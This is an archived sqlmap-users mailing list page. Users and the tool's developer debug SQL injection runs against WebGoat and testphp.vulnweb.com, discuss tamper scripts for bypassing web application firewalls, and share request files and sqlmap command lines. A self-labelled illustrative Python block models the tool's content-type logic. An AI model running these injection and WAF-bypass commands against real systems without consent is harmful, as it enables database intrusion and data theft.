sqlmap-users Mailing List for sqlmap (Page 5)
From: Miroslav S. <mir...@gm...> - 2015-11-12 11:05:33

https://github.com/sqlmapproject/sqlmap/issues/1531

Bye

--
Miroslav Stampar
http://about.me/stamparm
From: J. <hot...@qq...> - 2015-11-12 03:44:39

hi,

I want to display a non-ASCII table name with boolean blind injection. I tried all the ways I could find on the internet, but none of them seems to work in my case.

1. append --charset=UTF-8
2. append "# -*- coding: utf-8 -*-" to sqlmap.py
3. copy from the log to another editor.

Does anyone have success dealing with non-ASCII table names, for example Chinese?

------------------
Best Regards!
Zhang Nan
From: Miroslav S. <mir...@gm...> - 2015-10-28 13:04:59

With the latest commit you'll see something like this:

---
[#1] form:
POST http://testphp.vulnweb.com:80/search.php?test=query
POST data: searchFor=&goButton=go
do you want to test this form? [Y/n/q]
> n
URL 2:
GET http://testphp.vulnweb.com:80/artists.php?artist=1
do you want to test this URL? [Y/n/q]
> n
---

Bye
From: Miroslav S. <mir...@gm...> - 2015-10-28 12:56:13

This is not really the case.

---
$ python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --forms --crawl=1
[sqlmap banner, version 1.0-dev-caafa37, http://sqlmap.org]

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:54:32

do you want to check for the existence of site's sitemap(.xml) [y/N]
[13:54:34] [INFO] starting crawler
[13:54:34] [INFO] searching for links with depth 1
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N]

[13:54:36] [INFO] sqlmap got a total of 4 targets
[#1] form:
POST http://testphp.vulnweb.com:80/search.php?test=query
POST data: searchFor=&goButton=go
do you want to test this form? [Y/n/q]
> n
[#2] form:
GET http://testphp.vulnweb.com:80/artists.php?artist=1
do you want to test this form? [Y/n/q]
> n
[#3] form:
GET http://testphp.vulnweb.com:80/artists.php?artist=2
do you want to test this form? [Y/n/q]
> n
[#4] form:
GET http://testphp.vulnweb.com:80/artists.php?artist=3
do you want to test this form? [Y/n/q]
> n

[*] shutting down at 13:54:47
---

The only clumsy thing here is that everything is called "form" afterwards. Will make a dirty patch for this in a couple of mins.

Bye
From: David W. <da...@se...> - 2015-10-28 10:10:15

Hi,

It seems when using --crawl to spider a site, using --forms overrides normal behaviour, and hence ignores URL-based variables. Is there a simple way to --crawl a site and test for both URL- and form-based variables? In other words, to augment normal behaviour and --forms behaviour together.

Thanks

D
From: Miroslav S. <mir...@gm...> - 2015-10-26 09:49:19

Great that you've managed to solve it by yourself :)

Bye

p.s. thx for the donation
From: Rodrigo Z. S. <rod...@gm...> - 2015-10-25 15:50:18

Now I solved the problem!!!!

This was MY MISTAKE!!! All I needed to do was send the --user-agent exactly as curl was doing. I configured it with the --header option, but the correct way was to use --user-agent (because it was sent as the sqlmap user agent and failed with the actual session).

sqlmap is really a great program!!!
From: Rodrigo Z. S. <rod...@gm...> - 2015-10-25 15:10:02

ok, I did it now. Check your e-mail. Sorry for the delay. Check your e-mail.

I sent this mail at about 4AM and I needed to sleep :) Now it is 1PM, but today is Sunday.
From: Miroslav S. <mir...@gm...> - 2015-10-25 10:26:27

Can you please send me the URL privately?

Bye
From: Rodrigo Z. S. <rod...@gm...> - 2015-10-25 06:52:22

I am having bad times with sqlmap.

I can create a command with curl and I can see that the website is vulnerable. But if I try to mimic the same command with sqlmap, something goes wrong and I can't have success with any request in the site. Maybe it is because sqlmap uses another coding.

Can I use something similar to this:

- I write the cURL command and set the place I want sqlmap to inject the payload
- cURL does the request and writes a file
- sqlmap processes the file and continues as normal

The unique difference is: sqlmap WILL NOT do the internet request. Only cURL will do it.

If I can't do it, where can I change it in the source code to try to do this?
From: Miroslav S. <mir...@gm...> - 2015-10-21 08:24:07

Hi.

In practice you can try any of those tamper scripts. Maybe you'll get lucky. In theory, you should know both the WAF and the DBMS involved. Also, the big thing is that you should know how to bypass it manually before doing anything with tamper scripts or sqlmap in general.

Bye
From: Indra Z. <net...@gm...> - 2015-10-21 07:40:15

guys

is it true that to bypass the web application firewall I need to know what programming language and database are being used, or just the database?

thanks
Indra Z

--
--from the net with zero space--
From: Brandon P. <bpe...@gm...> - 2015-10-20 01:08:17

I am magically unable to reproduce this at the moment. If I end up seeing the behavior again, I will get more information to reproduce with. However, I did realize that I no longer actually need --skip-urlencode. At some point between when I last touched this code and now, POST request bodies are no longer URL encoded.

In any case, sorry for the noise.
From: Miroslav S. <mir...@gm...> - 2015-10-19 17:08:53

Either through request file or headers. Otherwise, sqlmap automatically sets it based on the recognized type (e.g. application/json for JSON)

Bye
From: Brandon P. <bpe...@gm...> - 2015-10-19 17:05:51

Just curious, how do you expect a user to set a specific content type? Is there an argument I am missing, or is --headers the expected way?

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Miroslav S. <mir...@gm...> - 2015-10-19 14:41:32

I really can't enforce this behavior. Waiting for your sample.

Bye
From: Brandon P. <bpe...@gm...> - 2015-10-19 14:04:59

Yes, I can, but it will have to be when I get home this evening.

FWIW, I am interacting with the sqlmap API, so not passing it a request file. I am building the SOAP XML programmatically, then setting it as the 'data' in the options (along with headers to specify text/xml and SOAPAction), with skipUrlEncode.

On Mon, Oct 19, 2015 at 9:02 AM, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> But sqlmap should automatically skip the url encoding of such request bodies if the content-type has been set to the proper value from the start (or if there was no content-type from the beginning).
>
> Can you please send a sample request file and/or the used sqlmap options.
>
> Bye

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Miroslav S. <mir...@gm...> - 2015-10-19 14:02:39

Hi.

But sqlmap should automatically skip the url encoding of such request bodies if the content-type has been set to the proper value from the start (or if there was no content-type from the beginning).

Can you please send a sample request file and/or the used sqlmap options.

Bye

On Mon, Oct 19, 2015 at 4:00 PM, Brandon Perry <bpe...@gm...> wrote:
> The actual request is a SOAP payload, which requires a content type of XML, and no URL encoding (which, if performed, returns a 50x).

--
Miroslav Stampar
http://about.me/stamparm
From: Brandon P. <bpe...@gm...> - 2015-10-19 14:00:09

The actual request is a SOAP payload, which requires a content type of XML, and no URL encoding (which, if performed, returns a 50x).

On Mon, Oct 19, 2015 at 6:37 AM, Miroslav Stampar <mir...@gm...> wrote:
> Hi Brandon.
>
> Sorry for the late reply. It goes like this.
>
> Your header value for content-type should be propagated/used, even in this case, in all cases but one.
>
> If you use --skip-urlencode and you (or your request file) state that the content-type should be "urlencoded", sqlmap forces a switch to either the "recognized" (e.g. json, xml, ...) or the "plain" one. So, that line that you've pinpointed will be triggered only in the described situation.
>
> Can you please describe what you are trying to accomplish? I believe that you are trying to leave some parts (non-payload) url encoded, while you want the payload to not be url encoded.
>
> Bye

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Miroslav S. <mir...@gm...> - 2015-10-19 11:37:21

Hi Brandon.

Sorry for the late reply. It goes like this.

Your header value for content-type should be propagated/used, even in this case, in all cases but one.

If you use --skip-urlencode and you (or your request file) state that the content-type should be "urlencoded", sqlmap forces a switch to either the "recognized" (e.g. json, xml, ...) or the "plain" one. So, that line that you've pinpointed will be triggered only in the described situation.

Can you please describe what you are trying to accomplish? I believe that you are trying to leave some parts (non-payload) url encoded, while you want the payload to not be url encoded.

Bye

On Sun, Oct 18, 2015 at 11:35 AM, Miroslav Stampar <mir...@gm...> wrote:
> Will patch it later today.
>
> Bye

--
Miroslav Stampar
http://about.me/stamparm
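The rule Miroslav lays out above, as an added example that is not sqlmap's code and not part of the thread: a small Python model of the content-type decision, with the constant values, the body-format sniffing, the SOAP sample and the helper names all assumed for illustration (only the two constant names come from the line Brandon quoted), plus the encoding step that shows why a URL-encoded SOAP envelope draws a 50x.

```python
"""Illustrative model of the content-type rule described in the thread.

Added example; this is NOT sqlmap's own code. It reproduces the rule as
stated: a user-supplied Content-Type header is kept in every case but one
(--skip-urlencode combined with a header that claims urlencoded form data),
where the tool switches to the recognized body format or to plain text.
Constant values, format sniffing and helper names are assumptions made for
this example; only the constant names and the .get(...) shape come from the
line quoted in the thread.
"""
import json
import re
from urllib.parse import quote_plus

# Assumed values: the real table in sqlmap may differ.
PLAIN_TEXT_CONTENT_TYPE = "text/plain; charset=utf-8"
POST_HINT_CONTENT_TYPES = {
    "JSON": "application/json",
    "XML": "application/xml; charset=utf-8",
    "SOAP": "application/soap+xml; charset=utf-8",
}
URLENCODED = "application/x-www-form-urlencoded"


def detect_post_hint(body):
    """Sniff the body format; stands in for kb.postHint from the thread."""
    s = body.strip()
    if s.startswith("<"):
        # XML that carries an Envelope element is treated as SOAP.
        return "SOAP" if re.search(r"<(\w+:)?Envelope\b", s) else "XML"
    if s[:1] in ("{", "["):
        try:
            json.loads(s)
            return "JSON"
        except ValueError:
            pass
    return None  # plain form data or anything unrecognised


def effective_content_type(user_header, skip_urlencode, body):
    """Return the Content-Type that goes on the wire under the thread's rule."""
    claims_form = bool(user_header) and user_header.lower().startswith(URLENCODED)
    if user_header and not (skip_urlencode and claims_form):
        # Every case but one: the user's header is propagated untouched
        # (Brandon's text/xml + SOAPAction setup lands here).
        return user_header
    # The one exception, and the no-header case: recognised format or plain.
    return POST_HINT_CONTENT_TYPES.get(detect_post_hint(body), PLAIN_TEXT_CONTENT_TYPE)


def encode_body(body, skip_urlencode):
    """Simplified stand-in for the tool's body encoding step.

    Without --skip-urlencode the body is percent-encoded like form data,
    which turns a SOAP envelope into something no SOAP endpoint parses
    (the 50x Brandon reports). With the switch the body is sent verbatim.
    """
    return body if skip_urlencode else quote_plus(body, safe="&=")


def build_request(user_headers, body, skip_urlencode):
    """Combine both steps: (final headers, body as it would be sent)."""
    headers = dict(user_headers)
    ct_key = next((k for k in headers if k.lower() == "content-type"), None)
    user_ct = headers.pop(ct_key) if ct_key else None
    headers["Content-Type"] = effective_content_type(user_ct, skip_urlencode, body)
    return headers, encode_body(body, skip_urlencode)


# Constructed sample SOAP body, not taken from the thread.
SOAP_BODY = (
    '<?xml version="1.0"?>'
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
    "<soap:Body><GetAccount><id>101</id></GetAccount></soap:Body>"
    "</soap:Envelope>"
)

if __name__ == "__main__":
    # Brandon's setup: explicit text/xml header plus skipUrlEncode.
    print(build_request({"Content-Type": "text/xml", "SOAPAction": '"GetAccount"'}, SOAP_BODY, True))
    # The one exception: header claims form data but the body is SOAP.
    print(effective_content_type(URLENCODED + "; charset=UTF-8", True, SOAP_BODY))
    # What happens to the envelope when URL encoding is not skipped.
    print(encode_body(SOAP_BODY, False)[:40])
```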
From: Miroslav S. <mir...@gm...> - 2015-10-18 09:35:51

Will patch it later today.

Bye

On Oct 17, 2015 04:32, "Brandon Perry" <bpe...@gm...> wrote:
> I tracked it down to ./lib/request/connect.py, line 726.
>
>     contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE)
>
> I am specifying a content type explicitly with --headers, so commenting this line out allowed sqlmap to detect the injections (the server returns 50x if the content type isn't right).
>
> Not sure what the correct solution is to this, as I understand the intent. Would this be more useful as a github issue?
From: Brandon P. <bpe...@gm...> - 2015-10-17 02:32:17

I tracked it down to ./lib/request/connect.py, line 726.

    contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE)

I am specifying a content type explicitly with --headers, so commenting this line out allowed sqlmap to detect the injections (the server returns 50x if the content type isn't right).

Not sure what the correct solution is to this, as I understand the intent. Would this be more useful as a github issue?
From: Vojtěch P. <kr...@gm...> - 2015-10-14 09:17:33

Hi,
continuing using Sqlmap from the Windows machine, now I am able to get everything without garbled characters and even without using a safe url.
Vojta

On 13.10.2015 at 21:14, Miroslav Stampar wrote:
> Problem is that request/responses are slow. Can't see why this is happening.
>
> Can you please send also the traffic.txt (-t traffic.txt) for such a run?
>
> I don't have a clue why a simple connection test is this slow.
>
> Bye
>
> On Oct 13, 2015 9:12 PM, "Brandon Perry" <bpe...@gm...> wrote:
>
> Nothing looks wrong in that pastebin? It retrieved the username of SA just fine it seems. No garbled text is in the output.
>
> What were you expecting to happen?
>
> On Tue, Oct 13, 2015 at 2:08 PM, Vojtěch Polášek <kr...@gm...> wrote:
>
> Hi,
> http://pastebin.com/Q9RKsffG
> I am running Arch Linux 64 bit and I am running Webgoat from the single jar file.
> I am using OpenJDK.
> Thank you,
> Vojta
>
> On 13.10.2015 at 18:54, Miroslav Stampar wrote:
>> Yup. The master branch is a good branch.
>>
>> And you are having difficulties even if you use a --flush-session along with the switches/options I've used?
>>
>> This is strange. I've run this numerous times in the last few days.
>>
>> Can you please send a complete console output as I've sent for my runs? Also, on which OS do you run WebGoat?
>>
>> Bye
>>
>> On Oct 13, 2015 6:50 PM, "Vojtěch Polášek" <kr...@gm...> wrote:
>>
>> Greetings,
>> now it works but...
>> I don't know what I am doing wrong, but it takes a very looong time for Sqlmap to finish this run. In your output, it takes several seconds, for me it takes almost an hour to get this done.
>> Also I found out that if I try to use --keep-alive, it is much faster, it takes about a minute, but it again returns garbled characters. No other optimization switches improve the speed.
>> I am using the same arguments as you, but from the enumeration arguments I am using just --current-user, no --dump, --dbs etc.
>> Just to be sure, I am pulling from the master branch, is this correct?
>> Thank you very much for your effort,
>> Vojtěch Polášek
>>
>> On 13.10.2015 at 13:07, Miroslav Stampar wrote:
>>> Hi.
>>>
>>> There has been a lot of work here. Please update to the latest revision and retry it again.
>>>
>>> One word of advice regarding WebGoat. It has a bad routine that automatically closes the SQLi after it finds certain keywords in requests. Basically, afterwards it just says "* Congratulations. You have successfully completed this lesson." and prevents further injection. Hence, you'll need to use --safe-url and --safe-freq to reset those. Please find details further in the pastebin links.
>>>
>>> Here you can find a couple of different runs:
>>>
>>> --technique=B
>>> http://pastebin.com/04z2x00S
>>>
>>> (no technique constraints)
>>> http://pastebin.com/UhGQLyTp
>>>
>>> Bye
>>>
>>> On Tue, Oct 13, 2015 at 10:18 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>
>>> Hi.
>>>
>>> There is still more work here to be done. Will let you know. I am going to try to finish it today.
>>>
>>> Bye
>>>
>>> On Tue, Oct 13, 2015 at 10:13 AM, Vojtěch Polášek <kr...@gm...> wrote:
>>>
>>> Greetings,
>>> I still have problems exploiting HSQL databases.
>>> current-user is still returning garbled characters etc.
>>> Is it still working for you?
>>> Thanks,
>>> Vojta
>>>
>>> On 10.10.2015 at 01:35, Miroslav Stampar wrote:
>>>> I've used that same request file without any problems (with the latest patches/revision). Will retest tomorrow. Please retry everything with --flush-session
>>>>
>>>> Bye
>>>>
>>>> On Oct 10, 2015 1:17 AM, "Vojtěch Polášek" <kr...@gm...> wrote:
>>>>
>>>> Greetings,
>>>> thanks for your prompt response.
>>>> Unfortunately, it is still not working as expected.
>>>> There is a problem with retrieving the current user and information from the HSQL database in general.
>>>> Moreover, when using the following request file from the same application, Sqlmap identified the backend database as PostgreSQL instead of HSQL.
>>>> This request is from the lesson about simple string SQL injection:
>>>> #begin request file
>>>> POST /WebGoat/attack?Screen=36&menu=1100 HTTP/1.1
>>>> Host: localhost:8080
>>>> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
>>>> Accept: */*
>>>> Accept-Language: cs,en-US;q=0.7,en;q=0.3
>>>> Accept-Encoding: gzip, deflate
>>>> Content-Type: application/x-www-form-urlencoded; charset=UTF-8
>>>> X-Requested-With: XMLHttpRequest
>>>> Referer: http://localhost:8080/WebGoat/start.mvc
>>>> Content-Length: 29
>>>> Connection: keep-alive
>>>> Pragma: no-cache
>>>> Cache-Control: no-cache
>>>> Cookie: JSESSIONID=valid_cookie
>>>>
>>>> account_name=Smith&SUBMIT=Go!
>>>> #end request
>>>> Feel free to ask me for more debugging information, I will be glad to help you.
>>>> Thanks for your work,
>>>> Vojta
>>>>
>>>> On 9.10.2015 at 16:52, Miroslav Stampar wrote:
>>>>> Fixed tons of bugs and pushed. Please retry it again.
>>>>>
>>>>> Bye
>>>>>
>>>>> On Fri, Oct 9, 2015 at 3:55 PM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>
>>>>> Please wait a bit. There are tons of bugs for HSQLDB in sqlmap. On it right now.
>>>>>
>>>>> Bye
>>>>>
>>>>> On Fri, Oct 9, 2015 at 2:20 PM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>
>>>>> Hi again.
>>>>>
>>>>> Please update to the latest revision and retry it again (with --flush-session).
>>>>>
>>>>> Backend used is HSQLDB while sqlmap wrongly recognized it as MySQL (because HSQLDB is a MySQL look-alike).
>>>>>
>>>>> Bye
>>>>>
>>>>> On Fri, Oct 9, 2015 at 12:49 PM, Vojtěch Polášek <kr...@gm...> wrote:
>>>>>
>>>>> Hi,
>>>>> You can download Webgoat here:
>>>>> https://webgoat.atlassian.net/builds/browse/WEB-WGM/latestSuccessful/artifact/shared/WebGoat-Embedded-Tomcat/WebGoat-6.0.1-war-exec.jar
>>>>> Just run java -jar WebGoat-6.0.1-war-exec.jar
>>>>> And you can login at localhost:8080/WebGoat with name webgoat and password webgoat.
>>>>> The request file posted earlier is from the Blind numeric SQL injection lesson.
>>>>> The application is written in Java and runs on an embedded Tomcat 7 server.
>>>>> I am using this command, where "request" is the request file posted earlier and valid_cookie is simply a valid cookie.
>>>>> python2 /opt/sqlmap/sqlmap.py -r request --level=5 --risk=3 -o --cookie="JSESSIONID=valid_cookie" -v3
>>>>> As I stated earlier, sqlmap finds the vulnerability but can't exploit it, I tried almost all tamper scripts, even some combinations, but no success.
>>>>> I wanted to show exploitation of Webgoat, because I would like to use Sqlmap for testing a commercial application which is based on similar technologies.
>>>>> Thank you,
>>>>> Vojta
>>>>>
>>>>> On 9.10.2015 at 11:16, Miroslav Stampar wrote:
>>>>>> Hi.
>>>>>>
>>>>>> Can you please send the used sqlmap command along with the basic info on the vulnerable environment (e.g. just a plain Webgoat, URL this and that)?
>>>>>>
>>>>>> Bye
>>>>>>
>>>>>> On Thu, Oct 8, 2015 at 10:52 PM, Vojtěch Polášek <kr...@gm...> wrote:
>>>>>>
>>>>>> Greetings,
>>>>>> I am running Webgoat from a standalone jar file, so I can't see any logs.
>>>>>> I will try to see some logs from inside the application. Anyway, I didn't expect this application to contain any kind of filtering.
>>>>>> I hope to show Sqlmap in action to some people from a large company and I wanted to use something simple, therefore I am quite surprised. I have never seen this situation - found injection but no possibility of exploitation.
>>>>>> The between tamper script didn't help.
>>>>>> Any suggestions are welcome.
>>>>>> Thanks,
>>>>>> Vojta
>>>>>>
>>>>>> On 8.10.2015 at 18:10, Brandon Perry wrote:
>>>>>>> You should look in the logs of the web server and see what they say.
>>>>>>>
>>>>>>> I bet you need --tamper=between
>>>>>>>
>>>>>>> Sent from a phone
>>>>>>>
>>>>>>>> On Oct 8, 2015, at 10:33 AM, Vojtěch Polášek <kr...@gm...> wrote:
>>>>>>>>
>>>>>>>> Greetings,
>>>>>>>> I tried to verify Sqlmap's functionality by running it against Webgoat version 6.0.1. You can try it yourself by using the following request file.
>>>>>>>> Just log in and replace the cookie with a valid one.
>>>>>>>> ###start request file
>>>>>>>> POST /WebGoat/attack?Screen=4&menu=1100 HTTP/1.1
>>>>>>>> Host: localhost:8080
>>>>>>>> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0
>>>>>>>> Accept: */*
>>>>>>>> Accept-Language: cs,en-US;q=0.7,en;q=0.3
>>>>>>>> Accept-Encoding: gzip, deflate
>>>>>>>> Content-Type: application/x-www-form-urlencoded; charset=UTF-8
>>>>>>>> X-Requested-With: XMLHttpRequest
>>>>>>>> Referer: http://localhost:8080/WebGoat/start.mvc
>>>>>>>> Content-Length: 29
>>>>>>>> Cookie: JSESSIONID=replace
>>>>>>>> Connection: keep-alive
>>>>>>>> Pragma: no-cache
>>>>>>>> Cache-Control: no-cache
>>>>>>>>
>>>>>>>> account_number=101&SUBMIT=Go!
>>>>>>>> #end request file
>>>>>>>> I am running git master of Sqlmap.
>>>>>>>> Sqlmap detects SQL injection (boolean based blind MySQL), but no information gathering commands work (--dbs, --current-user...). I tried running with --hex or --no-cast, but no luck.
>>>>>>>> What might be the problem?
>>>>>>>> Thanks,
>>>>>>>> Vojta
From: Vojtěch P. <kr...@gm...> - 2015-10-14 08:10:00

Hi,
I have several interesting findings.
I have to run Sqlmap on my Windows machine because of my presentation. So the current setup is like this: Webgoat running on my physical Arch Linux box with OpenJDK. Sqlmap running on Windows 7 64 bit in a virtual machine virtualized with Virtualbox. Sqlmap connects to Webgoat through a Virtualbox host-only network.
I don't experience any delays when running in this setup. I can even retrieve some information like the current user or the list of dbs without safe url. But I am getting malformed results when trying to get the list of tables, even with safe url. I will send you another traffic file.
Thinking about that delay, I came upon an idea that name translation may slow down my Sqlmap running on Linux. I modified my request file to use 127.0.0.1 instead of localhost. Now it is really fast, but it can't detect the injection point :-D
I am getting really confused now. So I will send you a traffic file from my Windows host and also from my Linux host when using the IP address instead of localhost. Is that ok for you?
Thank you very much,
Vojta

On 13.10.2015 at 21:14, Miroslav Stampar wrote:
> Problem is that request/responses are slow. Can't see why this is happening.
>
> Can you please send also the traffic.txt (-t traffic.txt) for such a run?
>
> I don't have a clue why a simple connection test is this slow.
>
> Bye
>> <mailto:sql...@li...> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > ------------------------------------------------------------------------------ > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > > ------------------------------------------------------------------------------ > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
From: Miroslav S. <mir...@gm...> - 2015-10-13 19:14:51
|
Problem is that requests/responses are slow. Can't see why this is happening. Can you please send also the traffic.txt (-t traffic.txt) for such a run? I don't have a clue why a simple connection test takes this long.

Bye

On Oct 13, 2015 9:12 PM, "Brandon Perry" <bpe...@gm...> wrote:
> Nothing looks wrong in that pastebin? It retrieved the username of SA just fine it seems. No garbled text is in the output.
>
> What were you expecting to happen?
>
> On Tue, Oct 13, 2015 at 2:08 PM, Vojtěch Polášek <kr...@gm...> wrote:
>
>> Hi,
>> http://pastebin.com/Q9RKsffG
>> I am running Arch Linux 64 bit and I am running Webgoat from the single jar file.
>> I am using OpenJDK.
>> Thank you,
>> Vojta
>>
>> On 13.10.2015 at 18:54 Miroslav Stampar wrote:
>>
>> Yup. The master branch is a good branch.
>>
>> And you are having difficulties even if you use --flush-session along with the switches/options I've used?
>>
>> This is strange. I've run this numerous times in the last few days.
>>
>> Can you please send a complete console output as I've sent for my runs? Also, on which OS do you run WebGoat?
>>
>> Bye
>> On Oct 13, 2015 6:50 PM, "Vojtěch Polášek" <kr...@gm...> wrote:
>>
>>> Greetings,
>>> now it works but...
>>> I don't know what I am doing wrong, but it takes a very long time for Sqlmap to finish this run. In your output, it takes several seconds, for me it takes almost an hour to get this done.
>>> Also I found out that if I try to use --keep-alive, it is much faster, it takes about a minute, but it again returns garbled characters. No other optimization switches improve the speed.
>>> I am using the same arguments as you, but from the enumeration arguments I am using just --current-user, no --dump, --dbs etc.
>>> Just to be sure, I am pulling from the Master branch, is this correct?
>>> Thank you very much for your effort,
>>> Vojtěch Polášek
>>>
>>>
>>> On 13.10.2015 at 13:07 Miroslav Stampar wrote:
>>>
>>> Hi.
>>>
>>> There has been a lot of work here. Please update to the latest revision and retry it again.
>>>
>>> One word of advice regarding WebGoat. It has a bad routine that automatically closes the SQLi after it finds certain keywords in requests. Basically, afterwards it just says "* Congratulations. You have successfully completed this lesson." and prevents further injection. Hence, you'll need to use --safe-url and --safe-freq to reset those. Please find details further in the pastebin links.
>>>
>>> Here you can find a couple of different runs:
>>>
>>> --technique=B
>>> http://pastebin.com/04z2x00S
>>>
>>> (no technique constraints)
>>> http://pastebin.com/UhGQLyTp
>>>
>>> Bye
>>>
>>> On Tue, Oct 13, 2015 at 10:18 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>
>>>> Hi.
>>>>
>>>> There is still more work here to be done. Will let you know. I am going to try to finish it today.
>>>>
>>>> Bye
>>>>
>>>> On Tue, Oct 13, 2015 at 10:13 AM, Vojtěch Polášek <kr...@gm...> wrote:
>>>>
>>>>> Greetings,
>>>>> I still have problems exploiting HSQL databases. current-user is still returning garbled characters etc.
>>>>> Is it still working for you?
>>>>> Thanks,
>>>>> Vojta
>>>>>
>>>>> On 10.10.2015 at 01:35 Miroslav Stampar wrote:
>>>>>
>>>>> I've used that same request file without any problems (with latest patches/revision). Will retest tomorrow. Please retry everything with --flush-session
>>>>>
>>>>> Bye
>>>>> On Oct 10, 2015 1:17 AM, "Vojtěch Polášek" <kr...@gm...> wrote:
>>>>>
>>>>>> Greetings,
>>>>>> thanks for your prompt response.
>>>>>> Unfortunately, it is still not working as expected.
>>>>>> There is a problem with retrieving the current user and information from the HSQL database in general.
>>>>>> Moreover, when using the following request file from the same application, Sqlmap identified the backend database as Postgresql instead of HSQL.
>>>>>> This request is from the lesson about simple string SQL injection
>>>>>> #begin request file
>>>>>> POST /WebGoat/attack?Screen=36&menu=1100 HTTP/1.1
>>>>>> Host: localhost:8080
>>>>>> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
>>>>>> Accept: */*
>>>>>> Accept-Language: cs,en-US;q=0.7,en;q=0.3
>>>>>> Accept-Encoding: gzip, deflate
>>>>>> Content-Type: application/x-www-form-urlencoded; charset=UTF-8
>>>>>> X-Requested-With: XMLHttpRequest
>>>>>> Referer: http://localhost:8080/WebGoat/start.mvc
>>>>>> Content-Length: 29
>>>>>> Connection: keep-alive
>>>>>> Pragma: no-cache
>>>>>> Cache-Control: no-cache
>>>>>> Cookie: JSESSIONID=valid_cookie
>>>>>>
>>>>>> account_name=Smith&SUBMIT=Go!
>>>>>> #end request
>>>>>> Feel free to ask me for more debugging information, I will be glad to help you.
>>>>>> Thanks for your work,
>>>>>> Vojta
>>>>>> On 9.10.2015 at 16:52 Miroslav Stampar wrote:
>>>>>>
>>>>>> Fixed tons of bugs and pushed. Please retry it again.
>>>>>>
>>>>>> Bye
>>>>>>
>>>>>> On Fri, Oct 9, 2015 at 3:55 PM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>>
>>>>>>> Please wait a bit. There are tons of bugs for HSQLDB in sqlmap. On it right now.
>>>>>>>
>>>>>>> Bye
>>>>>>>
>>>>>>> On Fri, Oct 9, 2015 at 2:20 PM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>>>
>>>>>>>> Hi again.
>>>>>>>>
>>>>>>>> Please update to the latest revision and retry it again (with --flush-session).
>>>>>>>>
>>>>>>>> Backend used is HSQLDB while sqlmap wrongly recognized it as MySQL (because HSQLDB is a MySQL look-alike)
>>>>>>>>
>>>>>>>> Bye
>>>>>>>>
>>>>>>>> On Fri, Oct 9, 2015 at 12:49 PM, Vojtěch Polášek <kr...@gm...> wrote:
>>>>>>>>
>>>>>>>>> Hi,
>>>>>>>>> You can download Webgoat here:
>>>>>>>>> https://webgoat.atlassian.net/builds/browse/WEB-WGM/latestSuccessful/artifact/shared/WebGoat-Embedded-Tomcat/WebGoat-6.0.1-war-exec.jar
>>>>>>>>> Just run java -jar WebGoat-6.0.1-war-exec.jar
>>>>>>>>> And you can log in at localhost:8080/WebGoat with name webgoat and password webgoat
>>>>>>>>> The request file posted earlier is from the Blind numeric SQL injection lesson.
>>>>>>>>> The application is written in Java and runs on an embedded Tomcat 7 server.
>>>>>>>>> I am using this command, where "request" is the request file posted earlier and valid_cookie is simply a valid cookie.
>>>>>>>>> python2 /opt/sqlmap/sqlmap.py -r request --level=5 --risk=3 -o --cookie="JSESSIONID=valid_cookie" -v3
>>>>>>>>> As I stated earlier, sqlmap finds the vulnerability but can't exploit it, I tried almost all tamper scripts, even some combinations, but no success.
>>>>>>>>> I wanted to show exploitation of Webgoat, because I would like to use Sqlmap for testing of a commercial application which is based on similar technologies.
>>>>>>>>> Thank you,
>>>>>>>>> Vojta
>>>>>>>>>
>>>>>>>>>
>>>>>>>>> On 9.10.2015 at 11:16 Miroslav Stampar wrote:
>>>>>>>>>
>>>>>>>>> Hi.
>>>>>>>>>
>>>>>>>>> Can you please send the sqlmap command used along with the basic info on the vulnerable environment (e.g. just a plain Webgoat, URL this and that)?
>>>>>>>>>
>>>>>>>>> Bye
>>>>>>>>>
>>>>>>>>> On Thu, Oct 8, 2015 at 10:52 PM, Vojtěch Polášek <kr...@gm...> wrote:
>>>>>>>>>
>>>>>>>>>> Greetings,
>>>>>>>>>> I am running Webgoat from a standalone jar file, so I can't see any logs.
>>>>>>>>>> I will try to see some logs from inside the application. Anyway, I didn't expect this application to contain any kind of filtering.
>>>>>>>>>> I hope to show Sqlmap in action to some people from a large company and I wanted to use something simple, therefore I am quite surprised. I have never seen this situation - found injection but no possibility of exploitation.
>>>>>>>>>> The between tamper script didn't help.
>>>>>>>>>> Any suggestions are welcome.
>>>>>>>>>> Thanks,
>>>>>>>>>> Vojta
>>>>>>>>>>
>>>>>>>>>> On 8.10.2015 at 18:10 Brandon Perry wrote:
>>>>>>>>>> > You should look in the logs of the web server and see what they say.
>>>>>>>>>> >
>>>>>>>>>> > I bet you need --tamper=between
>>>>>>>>>> >
>>>>>>>>>> > Sent from a phone
>>>>>>>>>> >
>>>>>>>>>> >> On Oct 8, 2015, at 10:33 AM, Vojtěch Polášek <kr...@gm...> wrote:
>>>>>>>>>> >>
